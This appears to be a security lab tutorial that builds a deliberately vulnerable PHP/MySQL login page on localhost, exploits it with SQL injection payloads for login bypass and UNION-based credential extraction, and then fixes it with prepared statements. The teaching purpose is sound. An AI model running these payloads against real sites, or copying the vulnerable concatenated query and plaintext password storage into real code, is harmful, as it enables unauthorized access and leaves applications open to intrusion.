Objective
Learn to exploit basic SQL Injection vulnerabilities in a login form to understand how attackers can bypass authentication and gain unauthorized access to sensitive data.
Scenario
Imagine you’re performing a security assessment for a small e-commerce website. The website has a simple login form that connects to a backend database to verify user credentials. Due to improper handling of user input, the login form is vulnerable to SQL Injection. Your task is to identify and exploit this vulnerability to bypass authentication.
Lab Setup
Prerequisites:
- Basic knowledge of HTML, PHP (or any backend language), and SQL.
- XAMPP/LAMP/WAMP stack installed on your machine (or any web server with PHP and MySQL support).
- A code editor (e.g., VSCode, Sublime Text).
Step 1: Create the Vulnerable Web Application
Database Setup
Open phpMyAdmin and create a new database:
CREATE DATABASE vulnerable_db;Use the database:
USE vulnerable_db;Create a users table:
CREATE TABLE users (
id INT AUTO_INCREMENT PRIMARY KEY,
username VARCHAR(50) NOT NULL,
password VARCHAR(50) NOT NULL
);Insert sample users:
INSERT INTO users (username, password) VALUES ('admin', 'admin123');
INSERT INTO users (username, password) VALUES ('user', 'user123');PHP Script for Login
Create a file login.php:
<?php
$conn = mysqli_connect("localhost", "root", "", "vulnerable_db");
if (isset($_POST['login'])) {
$username = $_POST['username'];
$password = $_POST['password'];
$query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
$result = mysqli_query($conn, $query);
if (mysqli_num_rows($result) > 0) {
echo "<h2>Login Successful!</h2>";
} else {
echo "<h2>Invalid Credentials</h2>";
}
}
?>
<form method="POST" action="">
Username: <input type="text" name="username" required><br>
Password: <input type="password" name="password" required><br>
<button type="submit" name="login">Login</button> </span>
</form>Running the Application
Start your Apache and MySQL servers from XAMPP/WAMP/LAMP.
Place the login.php file in the web server’s root directory (htdocs for XAMPP).
Open the browser and navigate to http://localhost/login.php.
Exploitation Steps
Step 1: Testing for SQL Injection
- In the Username field, enter:
' OR '1'='1 - In the Password field, enter:
' OR '1'='1 - Click the Login button.
Expected Result:
The login is successful even without providing valid credentials.
The SQL query becomes:
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '' OR '1'='1';The condition '1'='1' is always true, bypassing authentication.
Step 2: Extracting Data
- Modify the input to:
- Username:
' UNION SELECT 1, username, password FROM users -- - Password: (Leave blank)
- Username:
Expected Result:
- This input attempts to union the users’ data with the original query, potentially displaying usernames and passwords.
Solution and Prevention
Problem Analysis
- The application directly inserts user input into the SQL query without sanitization.
Fixing the Vulnerability
Use Prepared Statements to mitigate SQL Injection:
<?php
$conn = new mysqli("localhost", "root", "", "vulnerable_db");
if (isset($_POST['login'])) {
$stmt = $conn->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->bind_param("ss", $username, $password);
$username = $_POST['username'];
$password = $_POST['password'];
$stmt->execute();
$result = $stmt->get_result();
if ($result->num_rows > 0) {
echo "<h2>Login Successful!</h2>";
} else {
echo "<h2>Invalid Credentials</h2>";
}
}
?>Testing After Fix
- Repeat the same SQL Injection attempts after implementing prepared statements.
- Observe that the application no longer allows SQL Injection.
Conclusion
In this lab, you learned how SQL Injection works and how attackers can bypass authentication. You also explored mitigation techniques, such as using prepared statements, to prevent SQL Injection vulnerabilities.
By understanding and practicing this basic form of attack, you gain insight into securing applications against such threats.
0 Comments